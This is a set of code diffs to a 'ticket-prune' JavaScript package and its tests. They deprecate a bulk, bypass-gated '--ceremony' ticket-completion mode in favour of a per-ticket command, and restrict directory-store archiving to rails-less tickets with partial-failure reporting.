+      } catch (error) {
+        // Each archive is its own committed transaction. On failure mid-batch,
+        // report what ALREADY archived (and which id failed) alongside the error,
+        // so the caller can recover rather than see a bare {ok:false} after an
+        // in-place mutation already landed.
+        return { ok: false, error: error.message, archived: archivedEntries, needsCeremony, failedId: item.id };
       }
-      return { ok: true, baseRef, write, ceremony, stale, active, archived: archivedEntries, needsCeremony };
-    } catch (error) {
-      return { ok: false, error: error.message };
     }
+    return { ok: true, baseRef, write, ceremony, stale, active, archived: archivedEntries, needsCeremony };
   }
 
   const locked = acquireLock(cwd);

--- a/packages/ticket-prune/lib/run.mjs
+++ b/packages/ticket-prune/lib/run.mjs
@@ -118,9 +118,23 @@ export function runTicketPrune(options = {}) {
     if (ceremony) {
       return { ok: false, error: 'ticket-prune --ceremony is not supported for the directory ticket store yet; complete rail-freezing tickets through the protected-base admin ceremony directly.' };
     }
+    // Archive ONLY tombstone-eligible tickets — same boundary the legacy path
+    // enforces. A rail-freezing or preexisting-completed-field ticket must NOT be
+    // auto-archived: archiving removes it from the active store and so unfreezes
+    // its rails without the per-ticket review the contract reserves for that. They
+    // are reported under needsCeremony and completed per-ticket via
+    // `adlc ticket complete`, exactly as on the legacy backend.
     const archivedEntries = [];
+    const needsCeremony = [];
     try {
       for (const item of stale) {
+        const ticket = ticketsById.get(item.id);
+        const disposition = ceremonyDisposition(ticket ?? { id: item.id }, item.reason);
+        if (disposition.disposition === 'done') continue;
+        if (disposition.disposition === 'ceremony') {
+          needsCeremony.push(disposition.entry); // rails-freeze / preexisting-completed-field → reported, not archived
+          continue;
+        }
         const current = canonicalStore.load();
         const result = archiveTicket(canonicalStore, resolve(cwd, '.adlc/ticket-archive'), item.id, {
           root: cwd,
@@ -130,7 +144,7 @@ export function runTicketPrune(options = {}) {
         });
         archivedEntries.push(result.archived);
       }
-      return { ok: true, baseRef, write, ceremony, stale, active, archived: archivedEntries };
+      return { ok: true, baseRef, write, ceremony, stale, active, archived: archivedEntries, needsCeremony };
     } catch (error) {
       return { ok: false, error: error.message };
     }

--- a/packages/ticket-prune/lib/run.mjs
+++ b/packages/ticket-prune/lib/run.mjs
@@ -44,17 +44,21 @@ export function runTicketPrune(options = {}) {
     ceremony = false,
   } = options;
 
-  // The ceremony COMPLETES rail-freezing shipped tickets, which expires their
-  // rails (T36) — a privilege an ordinary PR's rails-guard gate denies
-  // (assertBaseTicketContractsPreserved). Its output only lands via the
-  // protected-base/admin path, so gate it behind the same recorded override the
-  // gate itself uses (ADLC_RAILS_BYPASS=1) and write nothing without it. Checked
-  // FIRST, before any read, so a misfire never mutates the store.
-  if (ceremony && process.env.ADLC_RAILS_BYPASS !== '1') {
+  // `--ceremony` is DEPRECATED (#208). It was a bulk completion: it took no
+  // ticket ids and recomputed its target set at run time (a TOCTOU window and no
+  // per-ticket filter), wrote tickets.json directly via writeJsonAtomic without
+  // recording manifest evidence, and had no directory-store implementation. The
+  // canonical per-ticket path fixes all of that. Fail closed with a redirect,
+  // FIRST, before any read — so any already-shipped instruction that still calls
+  // `--ceremony` gets pointed at the safe command instead of silently mutating.
+  if (ceremony) {
     return {
       ok: false,
       error:
-        'ticket-prune --ceremony completes rail-freezing tickets (expiring their rails), a protected-base admin action; set ADLC_RAILS_BYPASS=1 to run it. Refusing and writing nothing.',
+        'ticket-prune --ceremony is deprecated (#208): it was a bulk, evidence-less, ' +
+        'legacy-store-only completion. Complete each reviewed ticket individually with ' +
+        '`adlc ticket complete <id> --write --authorize --json` — per-ticket (no TOCTOU), ' +
+        'records manifest evidence, and works on both the legacy and directory stores.',
     };
   }
 
@@ -173,13 +177,14 @@ export function runTicketPrune(options = {}) {
     // (never physical removal — the rails-guard CI gate hard-denies that; the
     // in-place add-only annotation it accepts for a rails-less ticket, so the
     // prune output merges through an ordinary PR).
-    // #198: under --ceremony (admin-gated above), ALSO complete rail-freezing
-    // stale tickets in place — the one action reserved for the protected-base
-    // admin ceremony (completing them expires their rails, T36). Both share the
-    // same add-only completed:true edit and the same re-classification guard.
+    // The only in-place write this tool performs is TOMBSTONING rails-less stale
+    // tickets under --write (add-only `completed: true`). Completing rail-freezing
+    // tickets is NOT done here anymore — that was `--ceremony`, deprecated above
+    // (#208); rail-freezing entries are always just reported under needsCeremony,
+    // to be completed per-ticket via `adlc ticket complete`. `ceremonyCompleted`
+    // is retained in the result shape (always empty) for consumer compatibility.
     const tombstoneIds = new Set();
     const tombstoned = [];
-    const completeIds = new Set();
     const ceremonyCompleted = [];
     const needsCeremony = [];
     for (const ticket of staleCandidates) {
@@ -194,33 +199,21 @@ export function runTicketPrune(options = {}) {
         }
         continue;
       }
-      // disposition === 'ceremony'
-      if (ceremony && disposition.entry.blocker === 'rails-freeze') {
-        // The protected-base action this whole flow exists for: complete the
-        // rail-freezing shipped ticket so its rails expire. Only the
-        // 'rails-freeze' blocker is completed — a 'preexisting-completed-field'
-        // ticket would need a field MUTATION (overwriting a deliberately-set
-        // value), a distinct, riskier operation kept out of scope; it stays
-        // reported under needsCeremony.
-        completeIds.add(ticket.id);
-        ceremonyCompleted.push({ id: ticket.id, reason: reclassified.reason, rails: disposition.entry.rails });
-      } else {
-        needsCeremony.push(disposition.entry);
-      }
+      // disposition === 'ceremony' — reported, never completed in-place here.
+      needsCeremony.push(disposition.entry);
     }
 
-    const writeIds = new Set([...tombstoneIds, ...completeIds]);
+    const writeIds = tombstoneIds;
     if (writeIds.size === 0) {
       // Nothing writable this pass (all stale ids were un-staled, already
-      // completed, tombstone-only under a ceremony-only run, or need a ceremony
-      // this run isn't performing). tickets.json is left untouched.
+      // completed, or are rail-freezing/preexisting-completed-field entries this
+      // tool only reports). tickets.json is left untouched.
       return { ok: true, baseRef, write, ceremony, stale, active, tombstoned, ceremonyCompleted, needsCeremony };
     }
 
-    // Add ONLY `completed: true` to each written ticket — the exact single-field
-    // annotation the gate accepts for a rails-less tombstone, and the minimal
-    // diff PR #199 used for the admin ceremony; touching any other field would
-    // make an ordinary-PR tombstone diff un-mergeable.
+    // Add ONLY `completed: true` to each tombstoned ticket — the exact single-field
+    // annotation the gate accepts for a rails-less tombstone; touching any other
+    // field would make an ordinary-PR tombstone diff un-mergeable.
     const updatedTickets = freshTickets.map((t) =>
       writeIds.has(t.id) ? { ...t, completed: true } : t);
 

--- a/packages/ticket-prune/test/detect.test.mjs
+++ b/packages/ticket-prune/test/detect.test.mjs
@@ -109,10 +109,22 @@ test('ceremonyDisposition: a rails-less pristine stale ticket is "tombstone" (or
   );
 });
 
-test('ceremonyDisposition: a rail-freezing stale ticket needs the ceremony (blocker rails-freeze; rails checked first)', () => {
+test('ceremonyDisposition: a railed ticket with NO completed field is rails-freeze', () => {
+  assert.deepEqual(
+    ceremonyDisposition({ id: 'T1', rails: ['test/a/**'] }, 'r'),
+    { disposition: 'ceremony', entry: { id: 'T1', reason: 'r', rails: ['test/a/**'], blocker: 'rails-freeze' } },
+  );
+});
+
+test('ceremonyDisposition: a railed ticket with completed:false is preexisting-completed-field, NOT rails-freeze', () => {
+  // A deliberately-set `completed: false` (kept incomplete to hold rails during
+  // follow-up work) must route to manual review — completing it would overwrite
+  // the value and expire rails the author kept on purpose. The completed-field
+  // check runs BEFORE the rails check. The blocker still carries the rails so the
+  // report shows them; it is just never advertised as safe to bulk-complete.
   assert.deepEqual(
     ceremonyDisposition({ id: 'T1', rails: ['test/a/**'], completed: false }, 'r'),
-    { disposition: 'ceremony', entry: { id: 'T1', reason: 'r', rails: ['test/a/**'], blocker: 'rails-freeze' } },
+    { disposition: 'ceremony', entry: { id: 'T1', reason: 'r', rails: ['test/a/**'], blocker: 'preexisting-completed-field' } },
   );
 });
 

--- a/packages/ticket-prune/test/format.test.mjs
+++ b/packages/ticket-prune/test/format.test.mjs
@@ -22,7 +22,7 @@ test('renderReport (write): a mixed result shows the tombstoned line, the comple
 
   assert.match(text, /Tombstoned 1 rails-less stale ticket\(s\) with completed:true in place:/);
   assert.match(text, /- T1: shipped scope/);
-  assert.match(text, /Stale but not auto-tombstonable — needs the protected-base admin ceremony \(2\):/);
+  assert.match(text, /Stale but not auto-tombstonable — complete each per-ticket on the protected-base path with `adlc ticket complete <id> --write --authorize --json` \(2\):/);
   // rails-freeze blocker renders the frozen globs...
   assert.match(text, /- T2: shipped scope \[freezes: test\/a\/\*\*, test\/b\/\*\*\]/);
   // ...preexisting-completed-field blocker renders the field explanation, not "freezes:".
@@ -96,22 +96,6 @@ test('#198 renderReport (dry-run): a railed shipped ticket is listed under the c
     ceremonyCompleted: [],
     needsCeremony: [{ id: 'T7', reason: 'shipped scope', rails: ['test/codec/**'], blocker: 'rails-freeze' }],
   });
-  assert.match(text, /needs the protected-base admin ceremony \(1\):/);
+  assert.match(text, /complete each per-ticket on the protected-base path with `adlc ticket complete <id> --write --authorize --json` \(1\):/);
   assert.match(text, /- T7: shipped scope \[freezes: test\/codec\/\*\*\]/);
-});
-
-test('#198 renderReport (ceremony): completed rail-freezing tickets render under the "Completed … via the admin ceremony" section', () => {
-  const text = renderReport({
-    baseRef: 'origin/main',
-    write: false,
-    ceremony: true,
-    stale: [{ id: 'T7', reason: 'shipped scope' }],
-    active: [],
-    tombstoned: [],
-    ceremonyCompleted: [{ id: 'T7', reason: 'shipped scope', rails: ['test/codec/**'] }],
-    needsCeremony: [],
-  });
-  assert.match(text, /\(ceremony\)/);
-  assert.match(text, /Completed 1 rail-freezing ticket\(s\) via the admin ceremony \(rails now expire, T36\):/);
-  assert.match(text, /- T7: freezes test\/codec\/\*\*/);
 });

--- a/packages/ticket-prune/test/format.test.mjs
+++ b/packages/ticket-prune/test/format.test.mjs
@@ -7,7 +7,7 @@ import { renderReport, toJson } from '../lib/format.mjs';
 // literal strings (e.g. "completed:true", the empty-state lines, the ceremony
 // section) can't silently drift into a display lie.
 
-test('renderReport (write): a mixed result shows the tombstoned line, the completed:true wording, and the not-auto-tombstonable ceremony section for both blockers', () => {
+test('renderReport (write): rails-freeze entries get the completion command; preexisting-completed-field entries are steered to a manual decision, NOT the command', () => {
   const text = renderReport({
     baseRef: 'HEAD',
     write: true,
@@ -22,13 +22,20 @@ test('renderReport (write): a mixed result shows the tombstoned line, the comple
 
   assert.match(text, /Tombstoned 1 rails-less stale ticket\(s\) with completed:true in place:/);
   assert.match(text, /- T1: shipped scope/);
-  assert.match(text, /Stale but not auto-tombstonable — complete each per-ticket on the protected-base path with `adlc ticket complete <id> --write --authorize --json` \(2\):/);
-  // rails-freeze blocker renders the frozen globs...
+
+  // rails-freeze: gets the per-ticket completion command.
+  assert.match(text, /Shipped but still freezing rails — complete each per-ticket .*adlc ticket complete <id> --write --authorize --json` \(1\):/);
   assert.match(text, /- T2: shipped scope \[freezes: test\/a\/\*\*, test\/b\/\*\*\]/);
-  // ...preexisting-completed-field blocker renders the field explanation, not "freezes:".
-  assert.match(text, /- T3: shipped scope \[already has a completed field\]/);
-  assert.doesNotMatch(text, /- T3:.*freezes:/);
-  // Active section still present.
+
+  // preexisting-completed-field: steered to a manual decision, explicitly NOT the command.
+  const manualIdx = text.indexOf('Already carry a `completed` field');
+  assert.ok(manualIdx !== -1, 'manual-decision section present');
+  assert.match(text.slice(manualIdx), /NOT `adlc ticket complete`/);
+  assert.match(text.slice(manualIdx), /- T3: shipped scope/);
+  // T3 must not sit under the "complete each" command heading.
+  const cmdIdx = text.indexOf('Shipped but still freezing rails');
+  assert.doesNotMatch(text.slice(cmdIdx, manualIdx), /T3/);
+
   assert.match(text, /Active tickets \(1\):/);
   assert.match(text, /- T9: still building/);
 });

--- a/packages/ticket-prune/test/format.test.mjs
+++ b/packages/ticket-prune/test/format.test.mjs
@@ -50,7 +50,7 @@ test('renderReport (write): with nothing tombstoned and no ceremony items, it sa
     needsCeremony: [],
   });
 
-  assert.match(text, /No stale tickets tombstoned\./);
+  assert.match(text, /No stale tickets tombstoned or archived\./);
   assert.doesNotMatch(text, /completed:true/);
   assert.doesNotMatch(text, /admin ceremony/);
   assert.match(text, /Active tickets \(0\):/);
@@ -87,6 +87,7 @@ test('toJson projects exactly the machine-readable fields, defaulting the new ar
     stale: [],
     active: [],
     tombstoned: [{ id: 'T1', reason: 'x' }],
+    archived: [],
     ceremonyCompleted: [],
     needsCeremony: [],
   });

--- a/packages/ticket-prune/test/run.test.mjs
+++ b/packages/ticket-prune/test/run.test.mjs
@@ -6,6 +6,7 @@ import { tmpdir } from 'node:os';
 import { dirname, join } from 'node:path';
 import { fileURLToPath } from 'node:url';
 import { runTicketPrune } from '../lib/run.mjs';
+import { renderReport, toJson } from '../lib/format.mjs';
 import { acquireLock } from '../lib/store.mjs';
 
 const HERE = dirname(fileURLToPath(import.meta.url));
@@ -719,5 +720,48 @@ test('#208: directory --write does not archive a deliberately completed:false ti
     assert.deepEqual((result.needsCeremony ?? []).map((e) => e.id), ['KEEP']);
     assert.equal(result.needsCeremony[0].blocker, 'preexisting-completed-field');
     assert.ok(existsSync(join(dir, '.adlc', 'tickets', ticketFilename('KEEP'))));
+  });
+});
+
+test('#208: directory --write surfaces archived ids in the result (observability)', () => {
+  withScratchRepo((dir) => {
+    rmSync(join(dir, '.adlc', 'tickets.json'), { force: true });
+    writeDirectoryStore(dir, [
+      { id: 'RAILLESS', title: 'rails-less shipped', scope: ['plugins/adlc-widget/**'] },
+    ]);
+    const result = runTicketPrune({ cwd: dir, write: true });
+    assert.equal(result.ok, true);
+    // The mutation must be visible in both the result and the public formatters.
+    assert.deepEqual((result.archived ?? []).map((a) => a?.id ?? a), ['RAILLESS']);
+    assert.deepEqual(toJson(result).archived.map((a) => a?.id ?? a), ['RAILLESS']);
+    assert.match(renderReport(result), /Archived 1 rails-less stale ticket\(s\) out of the active directory store:/);
+  });
+});
+
+test('#208: a directory batch that fails mid-way reports what already archived and which id failed', () => {
+  withScratchRepo((dir) => {
+    rmSync(join(dir, '.adlc', 'tickets.json'), { force: true });
+    // A and B are both rails-less shipped (archivable). B is referenced by active
+    // ticket C via an edge, so archiveTicket rejects B with ARCHIVE_INBOUND_EDGE.
+    // A must archive first, then B fails — a partial batch.
+    mkdirSync(join(dir, 'packages', 'a2'), { recursive: true });
+    writeFileSync(join(dir, 'packages', 'a2', 'x.mjs'), '// a\n');
+    mkdirSync(join(dir, 'packages', 'b2'), { recursive: true });
+    writeFileSync(join(dir, 'packages', 'b2', 'x.mjs'), '// b\n');
+    git(['add', '-A'], dir);
+    git(['commit', '-q', '-m', 'ship a2 b2'], dir);
+    writeDirectoryStore(dir, [
+      { id: 'AAA', title: 'rails-less shipped', scope: ['packages/a2/**'] },
+      { id: 'BBB', title: 'rails-less shipped', scope: ['packages/b2/**'] },
+      { id: 'CCC', title: 'still building', scope: ['packages/never-built/**'], edges: [{ to: 'BBB', kind: 'depends' }] },
+    ]);
+
+    const result = runTicketPrune({ cwd: dir, write: true });
+
+    assert.equal(result.ok, false);
+    assert.match(result.error, /BBB|inbound|referenced/i);
+    // The already-committed archive of AAA is reported, not lost behind the error.
+    assert.deepEqual((result.archived ?? []).map((a) => a?.id ?? a), ['AAA']);
+    assert.equal(result.failedId, 'BBB');
   });
 });

--- a/packages/ticket-prune/test/run.test.mjs
+++ b/packages/ticket-prune/test/run.test.mjs
@@ -508,162 +508,94 @@ test('#198 AC1: dry-run surfaces a rails-less preexisting-completed-field ticket
   });
 });
 
-test('#198 AC2: --ceremony without ADLC_RAILS_BYPASS=1 writes nothing and returns ok:false', () => {
-  withEnv('ADLC_RAILS_BYPASS', undefined, () => {
-    withScratchRepo((dir) => {
-      writeTickets(dir, [
-        {
-          id: 'T1',
-          title: 'Ship the widget',
-          scope: ['plugins/adlc-widget/**'],
-          rails: ['test/adlc-widget/**'],
-        },
-      ]);
-      const before = readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8');
+// ---- #208: --ceremony is deprecated (was #198's ceremony-completion path) ----
+//
+// It completed rail-freezing tickets in place: bulk (no ids, recomputed set —
+// TOCTOU + blast radius), evidence-less (writeJsonAtomic, no manifest), and
+// legacy-store-only. The canonical `adlc ticket complete <id> --write --authorize
+// --json` replaces it. runTicketPrune now fails closed on ceremony:true, and the
+// tests below cover the deprecation plus the behavior that REMAINS: --write still
+// tombstones rails-less stale tickets, and rail-freezing / preexisting-completed
+// entries are reported (never completed here).
 
-      const result = runTicketPrune({ cwd: dir, ceremony: true });
-
-      assert.equal(result.ok, false);
-      assert.match(result.error, /ADLC_RAILS_BYPASS/);
-      assert.equal(readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8'), before);
-    });
-  });
-});
-
-test('#198 AC3: --ceremony with ADLC_RAILS_BYPASS=1 completes a railed shipped ticket add-only and reports it under ceremonyCompleted; an active railed ticket is untouched', () => {
-  withEnv('ADLC_RAILS_BYPASS', '1', () => {
-    withScratchRepo((dir) => {
-      writeTickets(dir, [
-        {
-          id: 'T1',
-          title: 'Ship the widget',
-          scope: ['plugins/adlc-widget/**'],
-          rails: ['test/adlc-widget/**'],
-        },
-        {
-          id: 'T2',
-          title: 'Still building',
-          scope: ['packages/never-built/**'], // NOT shipped → active
-          rails: ['test/never-built/**'],
-        },
-      ]);
-
-      const result = runTicketPrune({ cwd: dir, ceremony: true });
-
-      assert.equal(result.ok, true);
-      assert.deepEqual(result.ceremonyCompleted.map((c) => c.id), ['T1']);
-      assert.deepEqual(result.needsCeremony, []); // T1 moved out of needsCeremony
-
-      const after = readTickets(dir);
-      // T1 gained EXACTLY completed:true (add-only), nothing else changed.
-      assert.deepEqual(after.tickets[0], {
-        id: 'T1',
-        title: 'Ship the widget',
-        scope: ['plugins/adlc-widget/**'],
-        rails: ['test/adlc-widget/**'],
-        completed: true,
+test('#208: runTicketPrune with ceremony:true fails closed and mutates nothing, regardless of ADLC_RAILS_BYPASS', () => {
+  for (const bypass of [undefined, '1']) {
+    withEnv('ADLC_RAILS_BYPASS', bypass, () => {
+      withScratchRepo((dir) => {
+        writeTickets(dir, [
+          { id: 'T1', title: 'Ship the widget', scope: ['plugins/adlc-widget/**'], rails: ['test/adlc-widget/**'] },
+        ]);
+        const before = readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8');
+        const result = runTicketPrune({ cwd: dir, ceremony: true });
+        assert.equal(result.ok, false);
+        assert.match(result.error, /deprecated/);
+        assert.match(result.error, /adlc ticket complete <id> --write --authorize --json/);
+        assert.doesNotMatch(result.error, /ADLC_RAILS_BYPASS/); // the old gate is gone
+        assert.equal(readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8'), before);
       });
-      // T2 (active, not shipped) is untouched — no completed field.
-      assert.equal(after.tickets[1].completed, undefined);
     });
+  }
+});
+
+test('#208: --write still tombstones a rails-less stale ticket; a railed one is only reported under needsCeremony', () => {
+  withScratchRepo((dir) => {
+    mkdirSync(join(dir, 'packages', 'second-widget'), { recursive: true });
+    writeFileSync(join(dir, 'packages', 'second-widget', 'index.mjs'), '// shipped later\n');
+    git(['add', '-A'], dir);
+    git(['commit', '-q', '-m', 'ship the second widget'], dir);
+
+    writeTickets(dir, [
+      { id: 'T1', title: 'rails-less shipped', scope: ['plugins/adlc-widget/**'] },
+      { id: 'T2', title: 'railed shipped', scope: ['packages/second-widget/**'], rails: ['test/second-widget/**'] },
+    ]);
+
+    const result = runTicketPrune({ cwd: dir, write: true });
+
+    assert.equal(result.ok, true);
+    assert.deepEqual(result.tombstoned.map((t) => t.id), ['T1']);           // rails-less → tombstoned
+    assert.deepEqual(result.ceremonyCompleted, []);                          // nothing completed in-place
+    assert.deepEqual(result.needsCeremony.map((c) => c.id), ['T2']);         // railed → only reported
+    assert.equal(result.needsCeremony[0].blocker, 'rails-freeze');
+
+    const after = readTickets(dir);
+    assert.equal(after.tickets[0].completed, true);   // T1 tombstoned
+    assert.equal(after.tickets[1].completed, undefined); // T2 untouched — completed via `adlc ticket complete`
   });
 });
 
-test('#198 AC4: after the ceremony completes a railed ticket, the base-rail union (skip completed===true) no longer includes its rails', () => {
-  withEnv('ADLC_RAILS_BYPASS', '1', () => {
-    withScratchRepo((dir) => {
-      writeTickets(dir, [
-        {
-          id: 'T1',
-          title: 'Ship the widget',
-          scope: ['plugins/adlc-widget/**'],
-          rails: ['test/adlc-widget/**'],
-        },
-      ]);
-      // The rails-guard union: every non-completed ticket's rails.
-      const railUnion = (tickets) =>
-        tickets.filter((t) => t.completed !== true).flatMap((t) => t.rails ?? []);
+test('#208: a preexisting-completed-field ticket is reported under needsCeremony and never rewritten', () => {
+  withScratchRepo((dir) => {
+    writeTickets(dir, [
+      { id: 'T1', title: 'Ship the widget', scope: ['plugins/adlc-widget/**'], completed: false },
+    ]);
+    const before = readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8');
 
-      assert.deepEqual(railUnion(readTickets(dir).tickets), ['test/adlc-widget/**']); // frozen before
+    const result = runTicketPrune({ cwd: dir, write: true });
 
-      const result = runTicketPrune({ cwd: dir, ceremony: true });
-      assert.equal(result.ok, true);
-
-      assert.deepEqual(railUnion(readTickets(dir).tickets), []); // expired after
-    });
+    assert.equal(result.ok, true);
+    assert.deepEqual(result.needsCeremony.map((c) => c.id), ['T1']);
+    assert.equal(result.needsCeremony[0].blocker, 'preexisting-completed-field');
+    assert.equal(readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8'), before); // completed:false stays
   });
 });
 
-test('#198 AC5: --ceremony does NOT touch a rails-less preexisting-completed-field ticket; it stays reported under needsCeremony', () => {
-  withEnv('ADLC_RAILS_BYPASS', '1', () => {
-    withScratchRepo((dir) => {
-      writeTickets(dir, [
-        { id: 'T1', title: 'Ship the widget', scope: ['plugins/adlc-widget/**'], completed: false },
-      ]);
-      const before = readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8');
-
-      const result = runTicketPrune({ cwd: dir, ceremony: true });
-
-      assert.equal(result.ok, true);
-      assert.deepEqual(result.ceremonyCompleted, []);
-      assert.deepEqual(result.needsCeremony.map((c) => c.id), ['T1']);
-      assert.equal(result.needsCeremony[0].blocker, 'preexisting-completed-field');
-      // Not rewritten: completed:false stays false, byte-identical.
-      assert.equal(readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8'), before);
-    });
-  });
-});
-
-test('#198: --write --ceremony together tombstone the rails-less and complete the railed shipped tickets in one pass', () => {
-  withEnv('ADLC_RAILS_BYPASS', '1', () => {
-    withScratchRepo((dir) => {
-      mkdirSync(join(dir, 'packages', 'second-widget'), { recursive: true });
-      writeFileSync(join(dir, 'packages', 'second-widget', 'index.mjs'), '// shipped later\n');
-      git(['add', '-A'], dir);
-      git(['commit', '-q', '-m', 'ship the second widget'], dir);
-
-      writeTickets(dir, [
-        { id: 'T1', title: 'rails-less shipped', scope: ['plugins/adlc-widget/**'] },
-        {
-          id: 'T2',
-          title: 'railed shipped',
-          scope: ['packages/second-widget/**'],
-          rails: ['test/second-widget/**'],
-        },
-      ]);
-
-      const result = runTicketPrune({ cwd: dir, write: true, ceremony: true });
-
-      assert.equal(result.ok, true);
-      assert.deepEqual(result.tombstoned.map((t) => t.id), ['T1']);
-      assert.deepEqual(result.ceremonyCompleted.map((t) => t.id), ['T2']);
-
-      const after = readTickets(dir);
-      assert.equal(after.tickets[0].completed, true);
-      assert.equal(after.tickets[1].completed, true);
-    });
-  });
-});
-
-test('#198: bin --ceremony without the bypass env exits 1 (operational error) and writes nothing', () => {
+test('#208: bin --ceremony exits 1 with the deprecation redirect and writes nothing', () => {
   withScratchRepo((dir) => {
     writeTickets(dir, [
       { id: 'T1', title: 'Ship the widget', scope: ['plugins/adlc-widget/**'], rails: ['test/x/**'] },
     ]);
     const before = readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8');
-    // Run the bin with ADLC_RAILS_BYPASS explicitly cleared from the child env.
-    const env = { ...process.env };
-    delete env.ADLC_RAILS_BYPASS;
     let code = 0;
     let stderr = '';
     try {
-      execFileSync(process.execPath, [BIN, '--ceremony', '--json'], { cwd: dir, encoding: 'utf8', env });
+      execFileSync(process.execPath, [BIN, '--ceremony', '--json'], { cwd: dir, encoding: 'utf8', env: process.env });
     } catch (err) {
       code = err.status ?? 1;
       stderr = err.stderr?.toString() ?? '';
     }
     assert.equal(code, 1);
-    assert.match(stderr, /ADLC_RAILS_BYPASS/);
+    assert.match(stderr, /deprecated/);
+    assert.match(stderr, /adlc ticket complete/);
     assert.equal(readFileSync(join(dir, '.adlc', 'tickets.json'), 'utf8'), before);
   });
 });

--- a/packages/ticket-prune/test/run.test.mjs
+++ b/packages/ticket-prune/test/run.test.mjs
@@ -1,7 +1,7 @@
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
 import { execFileSync, spawn } from 'node:child_process';
-import { mkdtempSync, rmSync, writeFileSync, mkdirSync, readFileSync } from 'node:fs';
+import { mkdtempSync, rmSync, writeFileSync, mkdirSync, readFileSync, existsSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { dirname, join } from 'node:path';
 import { fileURLToPath } from 'node:url';
@@ -661,5 +661,63 @@ test('bin: missing tickets file exits 1 (operational error)', () => {
     const { code, stderr } = runBin([], dir);
     assert.equal(code, 1);
     assert.match(stderr, /tickets file not found/);
+  });
+});
+
+// ---- #208: directory backend respects the ceremony boundary under --write ----
+//
+// A prior version archived EVERY stale ticket on the directory store with
+// authorized:true — including rail-freezing ones. Archiving removes a ticket from
+// the active store, so that silently unfroze its rails without the per-ticket
+// review the legacy path (and the contract) require. --write must archive only
+// tombstone-eligible tickets and report the rest under needsCeremony.
+import { ticketFilename } from '@adlc/tickets';
+
+function writeDirectoryStore(dir, tickets) {
+  const store = join(dir, '.adlc', 'tickets');
+  mkdirSync(store, { recursive: true });
+  writeFileSync(join(store, '.store.json'), JSON.stringify({ format: 'adlc-ticket-directory', version: 1 }));
+  for (const t of tickets) writeFileSync(join(store, ticketFilename(t.id)), JSON.stringify(t));
+}
+
+test('#208: directory --write archives only rails-less stale tickets; a rail-freezing one is reported, not archived', () => {
+  withScratchRepo((dir) => {
+    // withScratchRepo seeds a legacy tickets.json; remove it and use a directory store.
+    rmSync(join(dir, '.adlc', 'tickets.json'), { force: true });
+    mkdirSync(join(dir, 'packages', 'util'), { recursive: true });
+    writeFileSync(join(dir, 'packages', 'util', 'b.mjs'), '// shipped\n');
+    git(['add', '-A'], dir);
+    git(['commit', '-q', '-m', 'ship util'], dir);
+    writeDirectoryStore(dir, [
+      { id: 'RAILED', title: 'railed shipped', scope: ['plugins/adlc-widget/**'], rails: ['test/adlc-widget/**'] },
+      { id: 'RAILLESS', title: 'rails-less shipped', scope: ['packages/util/**'] },
+    ]);
+
+    const result = runTicketPrune({ cwd: dir, write: true });
+
+    assert.equal(result.ok, true);
+    assert.deepEqual((result.archived ?? []).map((a) => a?.id ?? a), ['RAILLESS']);
+    assert.deepEqual((result.needsCeremony ?? []).map((e) => e.id), ['RAILED']);
+    assert.equal(result.needsCeremony[0].blocker, 'rails-freeze');
+    // The rail-freezing ticket's shard must still exist — its rails are intact.
+    assert.ok(existsSync(join(dir, '.adlc', 'tickets', ticketFilename('RAILED'))),
+      'rail-freezing ticket must NOT be archived by --write');
+  });
+});
+
+test('#208: directory --write does not archive a deliberately completed:false ticket', () => {
+  withScratchRepo((dir) => {
+    rmSync(join(dir, '.adlc', 'tickets.json'), { force: true });
+    writeDirectoryStore(dir, [
+      { id: 'KEEP', title: 'kept incomplete', scope: ['plugins/adlc-widget/**'], completed: false },
+    ]);
+
+    const result = runTicketPrune({ cwd: dir, write: true });
+
+    assert.equal(result.ok, true);
+    assert.deepEqual((result.archived ?? []).map((a) => a?.id ?? a), []);
+    assert.deepEqual((result.needsCeremony ?? []).map((e) => e.id), ['KEEP']);
+    assert.equal(result.needsCeremony[0].blocker, 'preexisting-completed-field');
+    assert.ok(existsSync(join(dir, '.adlc', 'tickets', ticketFilename('KEEP'))));
   });
 });

--- a/packages/ticket-prune/test/run.test.mjs
+++ b/packages/ticket-prune/test/run.test.mjs
@@ -765,3 +765,33 @@ test('#208: a directory batch that fails mid-way reports what already archived a
     assert.equal(result.failedId, 'BBB');
   });
 });
+
+test('#208: bin --write --json surfaces partial-batch data (archived + failedId) on a mid-batch failure', () => {
+  withScratchRepo((dir) => {
+    rmSync(join(dir, '.adlc', 'tickets.json'), { force: true });
+    mkdirSync(join(dir, 'packages', 'a3'), { recursive: true });
+    writeFileSync(join(dir, 'packages', 'a3', 'x.mjs'), '// a\n');
+    mkdirSync(join(dir, 'packages', 'b3'), { recursive: true });
+    writeFileSync(join(dir, 'packages', 'b3', 'x.mjs'), '// b\n');
+    git(['add', '-A'], dir);
+    git(['commit', '-q', '-m', 'ship a3 b3'], dir);
+    writeDirectoryStore(dir, [
+      { id: 'AAA', title: 'rails-less', scope: ['packages/a3/**'] },
+      { id: 'BBB', title: 'rails-less', scope: ['packages/b3/**'] },
+      { id: 'CCC', title: 'active', scope: ['packages/never-built/**'], edges: [{ to: 'BBB', kind: 'depends' }] },
+    ]);
+    let out = '';
+    let code = 0;
+    try {
+      out = execFileSync(process.execPath, [BIN, '--write', '--json'], { cwd: dir, encoding: 'utf8', env: process.env });
+    } catch (err) {
+      code = err.status ?? 1;
+      out = (err.stdout?.toString() ?? '') + (err.stderr?.toString() ?? '');
+    }
+    assert.equal(code, 1);
+    // The committed archive of AAA and the failed id must be visible, not hidden behind the bare error.
+    assert.match(out, /"archived"/);
+    assert.match(out, /AAA/);
+    assert.match(out, /"failedId": ?"BBB"/);
+  });
+});

--- a/plugins/adlc-claude-code/commands/adlc-maintain.md
+++ b/plugins/adlc-claude-code/commands/adlc-maintain.md
@@ -71,8 +71,12 @@ adlc ticket-prune --json
   path, like the manual sweep in PR #199):
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main
